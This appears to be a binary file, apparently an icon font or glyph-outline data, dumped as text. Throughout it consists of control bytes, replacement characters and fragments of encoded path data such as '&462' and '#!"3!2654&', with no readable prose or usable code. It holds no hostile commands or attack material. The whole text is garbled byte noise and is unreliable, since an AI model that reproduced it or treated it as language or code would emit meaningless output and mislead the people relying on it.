7u8AM@�)Rjj�8u7ALAjj�
��b$2@O^l{�%#";264&267>5#26=4&"327>/.32>&/&'&32676&%32?>.%2?>.'&32?6&567654."A�	

	�	
�<�	
(q@	@�@@	��@
@@@%
(
(�%!-8ara8-$ J



�C
C*
6

��		s
�
6
6
��D=(:H9`88`9H:-6F���-=J6676'&'7&/&6"3726=#"=3%326=4&+"%"#!54&h"!	�  ��y���AAO`a
a'$%&"!%%
a;"0���t��4{	����A^#&'.">&'.54632674767632;2#"32>4.&+";32?>'&+76� n�nL^WG%
$*=2$;U$	:2>6<c88b�
}	E
	$/�2>%4985'bE@`%!0 )2$:

2)%&0SfR/�	�	}�	X	���0HQ.'&#6?676'&'&3!27676'676'>'6%+";7532654&"&462�0#)Q�	)F"'6'i 2&	%
0�
67�"(*#?%=#*:&@O�c&"-"& FK.[���j�i8R!BLPTX\`dhlptx|������6235.4?36325"&'##2&4635#"'27>75#"%53'3#73#73#73#73#73#73#73#73#73#3#73#73#73#73#73#73#73#73#`*.�#F*0�)��:w�IhFB
�|
!0�i'10''01z77J77J77I88J88J88J88J88J88��77J77J77I88J88J88J88J88J88�*-)a
q��::���	5-�		��Q%��BB�BBq
















� 
















�j�R!DQ%"/&4?627'&2?6&''&"7&4?62&'6?65&2?64&">�$}
�$? H��J���J� >�&}
�
$? H��g%
�&
��>%
�}$
�
> �J��I���J>"�}$
�> �%'�{
�'
�
���6s&'.;26?6762'&'&"6?67>&"#"'&"'&'&4?67>2?6764/&'.676?4~1& PP@>(>0%'-&$su)6,SSuU(��?22-.�
"
	()NL;9F=9*-QP!?'�5#;?)'%$&-us	)6.uT+PO��2.-�	(

*7:F<=PO-*@'��s'3?K!"3!2654&3#%3#!!!264&#!"!264&#!"!264&#!"!264&#!"<�p!!�  Ӟ��G��m�������,��,��,��, �!!� Z777�bK�tuu������C��%&'&'&'&'&67667676&'&76'.%&'&'5&'&"/.5/&'.&*3632?67276?767567?67625#%>76&'.7654&'&67>�
&)A72;(S;

	
382<"H[j2	)>P01!		
*(%(
(+,
,�0%	 # %A			'�'QA8JEv:+'
!Et	{M�p58D	?<S
t$"F�?
 �
�8				�	qv�<"2
.n#J,
'*"/	
')		6����
&/?HXa&'!!27675&"&462!!2675&'&'"&462!!27675&'&"&462!!27675&'&"&462�
�!!�
��.B..B.)��	��.B..B.)��
��.B..B.)�!�
��.B..B.�ST9 //A//�%*%TG!..B..�
%*%T	E!//A//�*%
T	F //A//����
$1=JT_";5)!276751"5.&'!!27675&%;5#;5)!26751"5.;5)!27675.#	
��R�

�K�
�<��
��R��T��V�
:I
��U
��TD��G
��
T
�TF
��T	����(>Qg����!#3!2675#.&/!#3632675&!"3!27675#.!#"3!676?5.6?67#35#5##276?>54&#"676235#76"&'327>54'&/&/&'#>7654'&'.#"6?632+32#33535+7�	�	��L�	��	
��
�C`'@

	
l-

	
	!A5'#9H
T�L
T�G

T�VF	T;)##R$�		
#�			bS##��m!*�����6'&'&/&/"'&'&'47#36!72>=&'&76776372767367676'54&'56'.74'&'&=&'&67673"/&#*6767;26'23'6#&&'&'&5&'#646;#&5k!<K&IJ&P(2!��]?$
<l$'/
*!VE\��A	h	!"!	,
D��@;\


=beC(		
H;-%


[43\


 '?�!<%!2*.)X	H,	J)
S8Mq(4

	@

%	�zl$8eJC$r��	���"'&'&'&'.676��p���[
	��� DAJQ��(*&'&'&'&'&76&6.'&>� e?b]�AtP
+d>*
�#?%*G*%@%)F*B*"��*(#�nj?j@ON��-W;3%C+#B+%C+#B��6&54."#!%4>2!#7.5462�Gz�><G9��-LZL,���[
#2"
�xHzG$#zHx��x-L,,L-x���##���+64'&"!"3!273#!2654&#!���9���

v�9���$$��M&;�
c
�;t��z$�$��
"!.267!!!64265#�Hu�uHHu�Nu?����-hF99F�F89EV.i..g��1���5IX`l������������%&'&'&/&'&676;667>767>&%#&#""&'&67676"&=46765&'&'26/&'#2>'.'&.7/&?'%&'&'.&'&%67676?64/6%7'67'%6?6'&'677''&/6"&462"&462y=J
Uv�3++=�	>S)F_O
��85GR	)G[(�	�

�67
,?2&*0(D')"
I)��ME2-�,;
 YCu
K0:��$�


o 	�1D11E0�1E11E1�
 c ")??&79V		0A6-
54i	(
+9c2	�/	��
":Q-'A0J* �	 $8
K, |	

1
>@&#
,-_
	.`�?#11F00#"21F01����"'9FO\&'&'&67676.>77&'76765&&'&'&7677"&>264'�65KMPT>=665LM�><��;mM'XtnL'W�8�G8N	\.O`N'�""6
		
	
�0"!%�Q><65�SP><65LM�'XvlL'WtnM3*'�Qx.P'=G\+
--
D

			
H
��*V%#"#!"&=46;26/&";23!26=4&7#"&=4&#!";26=463!2+"2?6&7W�ZT�
�R
1(�'2gS2'�'1X�T�
��WX���(11'���&22&�VW�����!;#5326=4&+";#"!4&%3#;326733267326=!�y�y��qq�
�
��dnn��nm��	8�o;jw"27>.'&".4>2.654'47676=6'"#54'"#54"#54"67654676754"2>4.OK}H&$>@�@>HJ>?I2T01SdS01S("4$�
	
�D.N..N\N/-OoJKI?=$%&%�|$%�91TcS01ScS1q#"%"���Z	G_\R\
^]'4&	��

 }O.M]O..N\O.����i'&'&'&56?6767676762767>5&7537676767>'.'&/&74'�*6O1-0?m

		
P
	 a5
%5G7+
G&
iG
8!T*6:�l

	0J:o
	:tci{>	(kJ= 
iw?B!A1)
	Mb	���
#-Gd!!!#!"&5!"3!26.'.%>?''2?64/&/&"72?43764/"5/&"#s��!��!��


'�X���vu�AAAA�)())4��##�n�6���969=@@	>>	�((''���	%Mo{?665'46?6/&/&"#""&/&?>6/&6?6&#7'&/&#"?66/4?667'77'w7
0.	7

:�6	%
cPV_CJ "
 ���^%
>JG9J�
8":	#71�	W_
	@f7'bM	�	  !���_$=`c:`���&*!!5!"&'&5&=!36767676'!!Z��6��TmU��a\�*))*�\a���+�3BB3M�\l5�pjjp�5l?���!#5.'3#5%#>2#3!7�<,�?\�7��77R^S7K��o��OJY4T	[A�9v'f�/K++K/m��"2BRb!"3!2654&#!'&'&5463!2#";26=4&!"3!26=4&!"3!26=4&#";26=4&|��!�=��#�����n��n~~���:�����!!�!!]!!`�����:C.+26=4?67&62>54?7656'264&"�7,�*7#�!,,@.,,67*����
�Z		 �
	c�,A,.>,���
.7EVcr������67>5.462..67676"&462&'&3274&%&/&#">&&'">&5767>.37>.7&'&326'6&/#"36&"3>&%>'&76."&33537>4&237>4&#&"7=`1)=	&7!.!!-!;X-*A		!;/E$�!"-!!�
*��
	z$			6		$"
�;
�(
o
*
$&	
	(��

q
	��
�(&H4P!
D*.*8(1'
!!-"!��.ED.20@L:P9#,"'!.!"-!�
	!		


�


!	A%

A	
'
��


�!

�2����*:Uj�������
0"264&476&/&'%&7%66546/.7%76#'&'&/&6&'&'&767>?6%/.5'4636767>'&6&''.57>/.?>?62'462"&"57467>=46?67&5476727>/"&'./&6264&/&/./43g !-!!"���
��#"
����
����

		
�	z	���O
*
	d
6�g/?Gc.�o*	O5L55K6�E$0w	T)	�� &O

���wJVA�f!-! .!8	_�o����
469�R	l7zr&
`
�5:!	_"[ 1+
�M
�"	$ie"|&55K66�
�
<'a2 ":&.
j0z7[���	
�������(,N!#&"!6=32676&!33!7!!767676=4&+";��
>A 
h#���}����#�I�Q%�{
5jQ
�

��"�`��"��C#�1�Pv	�5jQ
"���+8F32676#!";2+"3!2654&+"&=46".4>2&/2654'��	4
��
0�
�

�
z
1?l~l@?l�k?�1,)�+*
?
�k
�
?
�=?l??lk@?l(��		""
��J&2>JVbn~��'.4626=4&#!"23!2654&462"&5'462"&5'462"&5'462"&5'462"&5'462"&5!"&=463!232+"+"=4&+"=4;26=4;27!"&=46?>=463!2B?��	@	��UVUUV��	�	�..&--&�?	x?�`	|		|	`
��		"```````````�Rxx	H&..&..\
`		`

����3K%''7"#763777'6.'4&36765'676y;�




;VX6S-&A9NJ@:6.*&B�4	Hx9	%�
��	�'*	5�%�	��


�����
�1DUeu&'.?676767676'&'&67676''&'&67676&'&7>76'&'&7>7&1676'&D#*#�_
$(		
t�-��
		

Vg#
#%�*",�d	V,SJXc�S	!c-"6*5
!
�FiQ_�� V�fvOxxV�����?L^p&'&#'&36?>'&'&'&6367676'&&'6'&'6?%'%6'&'67%62&/&'76767675&1bN(B4C-,O3'

8
 LEX�A3	5B�8�&��!5�50/& D9!+,0.#D<	 6/'1!+T
�����:H21WG2-y��G\;>��[@$��3
)���"&*-''''''#!5#'#'#'#'#/#/!E�(BJG
QKK,�I=IquD��L��S��N��K���
!�����_�5�&�iKKW���\���R���E�6&9����PR��A!1A!"3!2654&+"&=46;2+"&=46;2+"&=46;2����***��
I

I
�
II
�
II
���++�+��
��

��

��	 6x�76'.>=4&7>'&=4&+"245&+"'&2+"3!26=4&+"&=467>76''&676&ZU/"9"�09�%�+E-�	E1H'	'O
P:]7#�#�>
�
	,0(<"%IfO�Q7���	A
"$�.L&N<4�'D(	;!EE-
Dd;+VA�	���^7>56'4'.%&+".=4&+"2+"3!26=4&+"&=467>76'd8U+18
0AD9"�
E1H(1S2EC7UPP:\8>-F
Q7��!2	(<"%IfO}�'C).S1�.L&]I=DE-De;+V��/+g6?67'"'&'&767!&/&'&76767672?&'&'76;7276'&7>'>/&?>'&/&76.6�
%>! 6_uT)S<		

	J&		
*
	
	M	.03* 5k�



	LT<*!%1>
*)#((!)*

���$-6?';5462326'7&'27264'%67'&"764&"264&"sL~ .���
�
'�
�'��
�$
�%�S  ����[[��	�
'�	�
'
�	�'��'�	, ���&"276764'&'&0!'.46?!�wfc9<<9cf�fc:<<:cf���R<:cf�fc:<<:cf�fc:<�-
&
&���!!"3!2654&0!'.46?!a�&**�++]��R+�&++�+�-
&
& �
!.46?���&&���'09BKT]fo"&=4&+"+"3!2654&"&462'"&462'"&462"&462'"&462'"&462"&462'"&462'"&4627+"&=46;2�

�G��U


T$���
(
(

�;

�
�Tih�ih�ih�

�

��PEWm��'6&'767>&'&".'6&'&"7&264'767264'.&>>'&6%'&>>'&6'&>�]	
L!K Z LCYX <Y
V7) Z@V!D^H3@��	�I	�
 
	>=7D	88  EEzP  67
z@@�*98 @Z �
=*3G�[;	��		 ����%,[!'767676762767676>4&'5#!"'&'&/&'&7676767676?!%4&'57.'5#&'&'356766s�bs
 &!	

	 &!��X
�
'�(




�


��*;>,)$)41	@)$1�kk


		

��PlH��<952-+%$

$%+-259R"+
Q	$.BW
(&'���476&327>76&#"'&'&N(

V�%&>;fjz_VT}
SZo_]68Q[R
 }SV_zjf;>&%�V
'86]_��-/"&"'&4'./6&'776767��
;���p



�A>�,$��� $
ae)3->+���6?[.'64."3;533533533267367>56&2"&460!5.4632676762632@%yK
4=4
Jy%$07#�$�#270��;��*@C��)�D`<34`C
='/��������

/'=�b$<#$G< ��;.'&'&'&'&'&&'&'&76?67767676�
$'#!'LL&!#'$
&09=7<,,<7=90&r
88

!'
&&
'��/3!26=4&#!"!26=4&#!"!26=4&#!"?(�((�(D�((�((�''�((t((((�|((((��(''(��*27<A&+532?>/.+."#";;26532?>'3#'73#53���	77�.A.�77	�d�6	ކ/-���-/�%��/�O@

K!/1#IL

@�%

@

M?5M5@u�u@���$0<Ib67>'&47'7&%676&'67&47&'?&47&'&'%676&'&'&'>54&"!&�&wv%A#"!#�]v%C#""#@%vHX&E2B
W�UWWF1�$8:
0""%81#.&9vf94&6L5%1��&k��k&:OM�MQ�m%=QM�LN9&l�nM%;VR�7O��N�N
=VR�&1}2
(noo?1(96m&%1��^~t�1&66&1:����\����4&+"#!"&4&+"+";2;226=46;26463!2;226=46;2646;26=4&+"&%#";264&+"&=46;26=4&#!";2'5463!2#!"&32+";264&+"&=46;26=4&#!"7!2#!"&=4632+";264&+"&=46;26=4&#!"7!2#!"&=46$����bb,	..	,bb��� o��nX���n�!p��*��� p!�n��+���	
	WWWWD��e�������������������"(39ASY_fr��������.'&"#327>735+&'7'''6?676#''6#662562"/"'3&6?&.'>5&'&'3'#3#53#7#7>35"'>76;?3276;3"/"#"'/5576?7&'6737+"'"&'46732654'&/&/.'&'&54>32"/3{tNQ�RNt..tNR�QNt/drG(M"/6�(s/	��2+P#
r"=>
r
G(M/3�AS*�7.<][:e�;=3?F
	
	'	
�~-E!#V'2*O0r 



	�S�$&%$�S�S�$&&$�S�(%1WR2#11	#�&'M
4:eff�ff+41WR-G,5&�*�"i73+K��xx{{�jj+
)�	*&'	E&L
%(;�


����5EUeu�54&#!"3!76767654&+"&463!2#!"'&'&'!2#!"&=4632+"&=46732+"&=46732+"&=46!32+"&=46<�	%�



Q�9	s	
��
D		��3���		��		����		�bQ��	%��		��	

���		n		m			�		�	���	'3?[";'5#3#326=4&7."2>4&".54677>32>36&'&/&/&'&��y=e�FF

::���vDDv���vEE��Fb5%#�-m�.l:Fb5%p


'		�
Txeex
T
�<EEv���vEEv�����5cE:m-�#&��#%5bF:l
$���(."2>4&".54677>32):���vDDv���vEE��Fb5%#�-m�.l:Fb5%�<EEv���vEEv�����5cE:m-�#&��#%5bF:l���O_o�!";2+";2+";2+";2+"3!2654&326=4&+"326=4&+"326=4&+"54&+";26z�3Z[\\\[[\���xxyyxx�xx[\-],]-\IT���p����<?M\m{��456'.#5.#5.#54&#4'.#54&#54.#!23!2!"&4623!2!"&4623!2#!"&46"#!"&767!2'"#!"&7>7!2'"#!"&7>7!2�







U���..��

/.
	��

0/
	��
--��
v

./��
	v

./��

v�





��;�
S
�
|
�
	S	���>E%&?67676'&'&/676&'&&7677265&/&.7K
Q+C9�I)�

�	1Q+6T�	�w#�
7T
0Q)6%2-sK
	�8t.<X
	-H 
1<
+9:	18����Rbr����#5#7#36564'476?>54'&'&'&#""76?636323654'!26=4&#!"!"3!26=4&!"3!26=4&!26514&#!"#!26514&#!"#!"13!26514&@�	
7A�a

	

A�d�

�q
&��



��


����q

!

��
&��


��8	�
	�N 	
"






U

l



9



y



��


y



9



��s7'#54&"#3#3335#5nn� -!���nn�nmm�nm7  7�6nm���6� 1Tan#"3276765.#"327676514&'"&.#"32>7>32>4.".4>2!".4>2M	
		%		�		%

	J@f#f@5Y55Y52V626V25Y55Y��#;##;F;##;�#;##;F<""<U
		
		
				�L<
;L4YjY40S22R04YjY4��#;F;##;F;##;F;##;F;#���v��%&'&476?>/&"#"&'&?6/&"'&'&/"3632676762?6=&546762?6&".'&>76'7>'.�"
'-%5	_	L@!2$$'	',$6`L

]2%$'�O*I/#F+.Q5(M>%* ).�L

\2$$
'"
,%6a	K
^2$%' 
'+%6a5%C)-Q5#F+0T4�.$/ %
����#3ETg}����!/&"/&&=!"3!2654&+"&=46;2'"22?54&#"265754&30+3>5754&/0#1326=4'&3"2?54'&30+3>754&/"#1326=4&'7"3>=4&V��$"!$��"11"�"21�1�

��P
XH�
Nɰ&##&�3$��#33#)$3��v���������������%M$��s'3?!"3!2654&32+"&46!"&463!2'!"&463!2'!"&463!2<�p!!�  �������~��~��~ �!!� ���������N^n}��&'&&'.'#"3267676/&7>32716767>7656747>76&#"'.7>3267676%"'.7>2>32#"'.>2"'.�

2�H
P�k-aD #*E	"F&)<# 
��

8!//M>#
.�}
	
	D
	
�
	
	�	
)4<E|�PW~*'	-+O0?(#: M�
+
+o2=
0FpG'"-[j*
*
r
)
*F
*
*�v1676?676&=46767%72�n�

�G5 @)Ll	��
,tr,	s.k�	�/#.	
		M�Z
&L�88���#+F#54&+54&+"#"#"3!2654&%4;2##!"&546;3!26=32�`B
X
B
`��BG�T
	S�--�H�M"�
�&

&�o��Z&2>KX##!3!2654&2654&#!+3!2#!"&46!2#!"&4646;2+"&3>=4&"*, �.y��(�cR


��	

	R


��	



	�


�	
i��

���-��[��(��

|


�	
��	�
����%676;36767676?67>574'26=4&#%"?5+#"'767676767676?6765'&'&"0"/&'&#"'&#"3276765463!2&BD'	

���I�	! 	"<'E'
 	%f;F
 )$�m	a

	



	

"		/"5-��s�AFK%&".=4'&'&>7>'&'&'&'&'&'&'.'&'&'&76'&'.76'&>76&767676;23276?67676'&&'&'&76/&'.'&?476676767>76?>&"&6?6'&#.'&767676?6'56'..76763206747476"756=.#>76'&6&6&6,:F+"@
	$$%-+9)&2d		

1	

STQ	

<%2

"�x)

	'
		>2'	
			

-
		
	DMip1
(%$
%.yG
D3	;.D1:/ R%?S


	

	 
<')!)0*#		

	
			
	
		'|2
2#
'<	
$	F{��.95#5##'6'.'>.7#!4&'5676=>4&�		q
W	q		0(P9F�F9P(0		�-	�	6	�
��@62!!26@��
���&6Zv7'&'&'&76767&/&6?6&/&6?623##5"'.'&5947>7639"9392>594.�4"'S"<<;%&
"uO)N�N)O�ZPOx"""!yOQYYQOx""""xOQYN�j<<j�NN�j<<j��.*^�"PMX]C!����w���"!yOQYYQOx"""!yOQYYQOx""4<j�NN�j<<j�NN�j<��@.>7'&'&'&'&7676767&/&6?6&/&6?6�#*#&(-&z!WZV68
!WF
s
<
s
�
s
=
s
�1-p.0�
2vq��c"�
�
#
�
��
�
"
�
����/?O_�3!26?6&#!".#!"3!26'654&4&/&?>"3!2654&#+"&=46;2#54&/&"#567326732654'654&#".#"&#"327;#!�x6�����>!00��=>/l

t[[�!
2

�V�=�~>�6�3����<�y=�
�4�
��$
��]]׸
	'
	

����|G%'&6;2676/&6;2>&/&";2;2;2;26=46;2676p�-
���
�
-�
�
r

�
ּ
�	}}��
�

�
���/?O_o#";26=4&54&+";26#";26=4&#";26=4&+";26=4&%326=4&+"!"3!2654&54&+";26�M
MWdd�eee
e����}��z��?eeMM��ee��e
eee�
�-��
���hee��"?5#54.#5474'&##";26?6&+767>76765&7"U%$�&Z2n	
�		6!d�
�
'�	�J3gJ��7.U



Er9p���;"276764'&'&0#"'#&'5#'.46?357>23�wfc9<<9cf�fc:<<:cf��
&	
��&�<:cf�fc:<<:cf�fc:<�-
��&��
&���6!"3!2654&0#"'#&'5#'.46?357>23a�&**�++]�
&	
��&�+�&++�+�-
��&��
&���)&'!'&"!!3276?!67656���, ��WW�W��
��X
����#'*/49=BGNRW3'&/%77#&/!3&/#3&'3'3'3336?#!737&/'3'&67#6?#��I$�%H��	ImI�G0+�ݑ"[�II�*�K�I*�I�
9��J8����m'!I%
$H�%Hn8�i!'��8� }A=)?~� 4~~~��T3K:&F~�4J~~H6~	b�
_��12D9})?}S)?~~
_21�j9D}
_���/?&'&'&'.7>'&/.7>767632654&+"Y$3
=&k�IK8`]=H�W\bX�02�:BB
@,$9OJ�n+4X�X
6�QSPV� bLO]�
f
��
���"/;D&3276?6'"&4?62"&4?62%"&4?627"&462���IL�&���5���
�qJ66J5&�H��	������B������5L55L���(2B4/&+"!35!32654&#!"2"&465!3!26%32+"&=>�C,���\D\ �k!!.!!,�(����
�j,C ���� S�� u!."".!����


���]&/&6?>'.'&&/&5&"'&/&'&'&6?6&/.>766?6764'&'&'$#3 &=��
/
���	'!'	
('+>�
<( 5!"	��
,(

��`�


*/!$''+>E���	
���-<AO]jv������#,38U[y�����������#*:?ERWftx}������������%29052"'8781#'#";2+"=4+";265746;232+"+"=4&+";232;26=4&+"&=4+"+"=4;26=46;2=4+"&=4+&#&=4&#'"&57&#"=4;254;2+"&54&#'"&=4&+"'4'4&+"2+";2+";2;2;2;2=4#'"=46372'#"=4;2#"&=46;2'40"!254#!"732+"=46!"3!254&#"=4;2%!"3!2654&#"&=4;285495463726=4+"&=4+"+"+";26576;23726=46;2'32+"&=4%32=4+"+";25746'#"=46;2013290#171#090150'0"153050"01;2=4&+"=4&+";209073265'4+"&5'&+"332702'149"930+";2=4+"=4"1518325746;2574&+"703%01#'011"45;2;26=4&+"%;26=4&+"89%32=4+";254&+";2'87418;26=4&+"41001517#";2=6&815326=4&+"#";26=421#2#554&+";26#";26=4&015121#89'0"810"1=4&+&;2'32=4&+"70#3326=4+"#";2=4#";26=4�)S�/FE��s � 	/uGGG�� FY�����,����+��n��,���%GtGG swGGHHRwT)*H H�� 
)*G +��LFN S I��GR�G��GGQ�GGS�MGG��$"GGRy(�X$T(*v(��ppqooEpp���T)sr	 H H IHG�_TQpI	H  	 G~���a�����r������������)$	HR�qs +U��))SYIH#GGS��G )xRG)**"G(GQ~G�('�(�RGG��(}#q(%+(��oo�pppp�e8D"'.'>54&"/&'654&"3273!2?32>&!"3!264&p"l
HJ!0"JH
l
!0""
�	�	�	!"�^
�
"E>!p""p!?F""/"��"/"����� Q"276764'&'&"'&4762"'56?>54'&#"&'&'76?63632�wfc9<<9cf�fc:<<:cfE#7##7#m!2
	%-

	)

fi<:cf�fc:<<:cf�fc:<�#6%IX
	M�!$
^P(���G!"3!2654&#"'&4762"'5676767654'&#"".'7676?2a�&**�++��! #5%l,/
!2*
 

)&fi+�&++�+�#5%#%W*N�

%/
^P%���0<>767654&#"&'&'76?67632"'&4762"�C
I?	
:"��!"
-J&0Q00Q�$37"$"�s7*(m��*]*0Q0����=!"&=47676;2)"&=47676;2���(G;|8

<

$8((���)H;|8

;

$8(((�cPB
,6#!&(�))�dPB
,5""&(�)����?!2&/&6767676.+"&=46)2&/&6767676.+"&=46Z(H:}8

;
8()�E(H:}7
=
8((�(�cQB
,6""(�((�cQB
,6#!(�(����FZ�6767>76;2?64/&#"#"+";2>7>?6%3267&+"&"#"'&'&'&/&'32732?64'�}

��	}%

	#m
n ;/'
$	
��n#

'M{n	�}
	

# 	 +*
�F1"
]
��^

 6


]'@�
](n^	�
^	R3^
����0Qc��32?>/&#"7326=4&#''&&/&'&36?6&/"6?676746?67676&'&'.#"&5'4&6?676/.K'/ E
?&V	�	l Lr�G+�.8
 
;$�	S��	
+"8�o:
f	xZ]�p	*<�v)
�	Z		f���
�+�U
h�p
DdZ�@��2'*�
���	+@ac�9<���)T#""&'&6?6&+"?6327>76&&'&'&#";267>7632;26=4&�*\@C��.	U
�

	>VYch\Y{
	>WZdh\Y{*\@CJN�.	
D
�'Em A9
	N

�

J(+/,�c
g
K*,.-�c
EmE<
D
����4n��765767>2?'#"'676?6767'67&'767>3&'&76'&&/&/&/&/'>'"/&7674?6�"6	4�-��P0$0�	

 
>	+
"".	$-As

*2R	F36� 1	

8. }N&
C1$""
! 
2#�/��R$:2�1(		U
0&VE_*4T.7U�!2
	
4*�P(
2J\		

�l454&6=4&/&4?>54&6=4636'&'&'.:�����	��B!Uf�Q��Qv��zVX�as	����54&6=4636'&'&'.���>��Y,r��������svǁ�&���=d2?6654&#!"&"/&;26/&'&476764')"&5463!264&#!"3!2654&+"U.�

*+�\	����>	�
`/��i���		�ZN				 .�
+*�\@	�<�	=�	`0��			����x��6BKU^gk%#54&+54&#!"3!;2>/&/33!26=4&+"=4;2!#"53#"#"&4627462#"7#53�%	�	
'
=$;V

��ݲ��pr*FFڳ	��DB
	Bo�
���$ӣ�}�h#G%546;26/&";23!26/.+"&%54&#!";2+"2?6&+"&?�
�?4%�`
�A4%�`�@�	�@�����%3i9�%4h�����'#5#3533#535#535#53%3#3#<��<��<<<<<<��EEFF//��l�"rsrsr���l����[;DPYi#54&+5>54&"#"#";;;26=326=326=4&462"&#"&46;27"&462#";26=4&&8'�(8(�'77',�,'8��%3$$4$#��&$%3$$8�

�� '6N ((	M7'  r!'6226'!r $$$3%$�**�$4$$4$��

����(,#"'!#"&462.54627&5462!5!�+
>��>
**=*�w+<+w�+<+�&H���*��%*=++�)%++%�׈++��n���(E7"2>4."32;265'&'.'&&'.'&#"32;265�#;##;F<##<�hYW35�-,�gk�DB��{w�34�	�#<F;##;F<#J	�43WZhtkf�+-�Į���AC�43�w|���91J"'&'&'&'.#1"#"32736767654&#1#"/&667672+H91&		%1:GM8\/../\8MbOF<�4](4LQ
	�

		
	
�MNQ:77:QN��IeV=�,I0/F1

���@Yby��'76'.#/&'&'."36?3276?26/7>54&'&'&4676762#""'632"'.4676762%64&"2"264&�k'�,nn
,�'kk'�,
nn
,�'k��	
	+K�I2
/
��"!�#uQ�

MM
�Q	Q�
MM
�Q
!&#
("'�K��		)")		#&z2!06���4Laq|%&/&#'6'.'&'4/233736?5"'&'"'&/&'&#7"5'&'&5&'&?6322&'&'&/#35&36'&'&'B-XB4&)!��-ZCM df��P%3&h��3B!6+��Rg���9�94Ok`�c,YB!)'4��-ZC%-"fd�0%4&h�,�g3B!6�0/$nOd9̕55@-C9��#$0<I!"3!2676&"/.76327632%3264&+"#";264&74&+";26��F
�F
F��
��
�'�����	(~~#��Rqii
aa"�
I
	��Y $:CG���23!7>=.'&#!"%2".6%!!'3!27>754&/!%2.>)!!54&+5!2675&'&#!"3!#"!"3!;2=!26=4&6"&46%!!�q
	��

c����i,o


��d����is��'��
 ��0C0N����hR�
�
�=�
�
��=�\l�
?/l>���y�%&'&'&'&?6/&"'&'&5'.#'"'&'&2?67623767>7676276764'&/&7676?65&74&.54>32.76'4?6/&'&'.?6&'&'&'&&'&'&/&?66?676767>'.76767676&'&"&>t.
*(:
())P/
H	:

G��);.*:/�-3
		
	2
+	1	%	�..?-,�<)*FC
*<
H	(M,)
�;).;)/�'4
-"
		
3,-
	"
%.?--@,���+GWs�!."#";267!26=4&"'.46762#."!"3!267326=4&"'.46762#."!"3!267326=4&"'.46762z�CQC))CQC�

��  
6�CPC�|�CPC�
�!
��CQC��
)DPC�

��
!!
�"))"
`"))"`
�%*%$,$�"**"
_"))"_
�	#,$$+$�+"))"_"))"_�$,#	%+$��%O%?67676762?64/&##!"&546;27676#!"3!26=4&
+]Jm$#��E?�J7]�$�
6�uZ!�(
@!���&cK�%�$���!	
%���A!"3!2654&".547'#".4>327&54>2#"&'>32a�&**�++�4�!143+q4=441m
�144+�&++�+�%3R#4=4143>4/6O4>3���1%"'64'732>4.".#"32672>4.�+J��I*.N..N\N-	�@#.N..N.#?�.M\M.-N�("w$S$G"'.M\N..N.I.N\M.{.N-.M\M.��[&'&'&7676?6'4SgK]JJ^KhQ_�Yz~&44&�P�v�M<g��~--����E%6?>&#!"&/.+";22654&63!2674'&54&#!"&/&63!26/E
�be=o%4%7&3%�^�		�;t�]
��2$%
		&$
4����+	&"!"3!2764#3#32654&��?��g��?Bz����rJA�o�BKL�xK�����+	&"!"3!27643#3#"&546���@��g��@A������rJA�o�BKL�xK���}/?;2654&+"32654&+"32654&+"'32654&+"�##$#�##$$�$$$$�$$$$�$$�$$��#_##��#$�##�5$#8##��#��54&#!"&=46;2654&#!";2#!"+";26=4&+"&=463!2+";26=4&+"&=463!2+";26=4&+"&D	��		v		��		v		��		G	�		G			G	�		G			G		�		G	#					��				"		�	�					�	�					�	�		���!"3!2654&462"&'!��f������&��H}�����5Zx�����23'&'&'&67676"#"3272?6'&'&'4&#'3676767>5&'&'&#767676'&'&"76&'&/&'&?67676'4'&'5&'&'&7676?676/4'&'&'&'&?6767676?56"764'.*"&'&6276'&�	sc`8;;:egzvdb::<9bdk#D
%'F
�^
!46F
e>C**37a+"	�	
?Q!	MC+'
k%0H%6+/-���E$	4F�:H��

4
	ei�aIq8;:aduzfd:;<:cf�eb::�q/B	
PF
�%%%�2;-/D@	
�� ;.
3*<F%$:
=C+�		3*	SG+6
-A-1�e8HT�	
W)0J���V	
�a	C�

DJ

}���)#"+"654&&'&;26546;26'�fS�	4�N	f
S
�t�N�p:�����k!26'&"!"276&��
��2��
��Z
;2;
�:��~��:�wWc76'.#&'&'&'&'&'&'&'&'&'&76;276?&#'&'&7>'&6'&'&
UvdT	I
Ln@
	�U6.\r@/9+
#B"3+)0���n9(��ղ$(Dz�G=5eu<_6�l)2
	A%"(-!	
"3''&oRD"-[�D>C"?��
/8&'76&'&32676&'57>&.>�+5"*	-J
)
�	+"8
�/K%��	
	�	b
4a5*BC!��-,
%34C5U[�u				����>%6'&'&367>76&'&'&76'&/76326a"w���bg#"kM����##
$c� 	��	.6�s�xKQ'mv�S>1<�	CTRK	D2� J<����->6767673"/.7676'&'&""'&%676763.54?:?\Yl*lY\?:	w
,1/�OnoO�/2
+
w�)(5J
�!1q^d6446d[t��+
;DňGG��E:
+��(7	�
���#0>LYgt.7>%676?5&5.2>4."4."2>2>4."'4."326772>5.4."2>1B@%506�7#%=
'7<+\1<33<22<2>-3p32<21Z2<22.@�@/1B/0�3<22<2p!2
,I#1&#

,'8�22<22~22,@2B2;322
24<1?./?2/@2�33;22���.=P`o����"";27>75&454.26567676.'">=4&32?6?>.&'&'&67&.>54'4&+";>7>54/.32>&'&'&.767>&6?6&�h5�
�rW66
k�
W	/\	�(4
-\�4
�A�

�AP6�p
	\.�M<\.J4
O}��'&�
O
Z-Z-��
	�
��48��4	\-
P�

�Z<	D
8��+#		4E-\

�����*U"3"/&32726/&47676'&'&626=4&+"7265474&#&'&�SE?,('xK�MGj

V;\X��K�/K0*>;�<�H=�S(#;7?��J�H	����_20�K�/Rg]a\I?/,-4ϳ���*8FTcr&26767>767>4&664'&'."26&'&'&64&'&'&"&'.2667676&"767>.�?.ZDPhV�?/�PDVh��VhPD�?.z?.��hVFNhVhPD<.?��hVCQ�.?�?.�hVDP��	VhQD�?/
���"2APbs����%#'"'"&5&74667>"'&'&'&>''&'.>%+.676.767>7'#".67676'&75>762.6'2"&>2'&'&6r-.99". 5&.	
'&$y!- �� (��'#

#!T
%
�
=$�%!/%"q# /$ [" "S -" gf  HAI	(;651$!)(�

,("A*#"�% 
&	p"$

& �A ��#/"$."�$/!%0 �!0"	���#,5>GP%2>&"264&"764&"264&"264&"264&"%&264>."26.�%1&$2�c
�	G	7	�	O	�S;k1&%3%�
��*	;	��	C	��	%	����#,5>GPY%.76?67>7>&">..2>'64.2%>4&"&"264264&"64&84K#��1,
'�S::R:�4J55K��0C/0C��4&&4%!-!!.�
%%�L 94�2	-1��:S99R�K44J6�C00B0�w&3&%5�.  .!z
$&
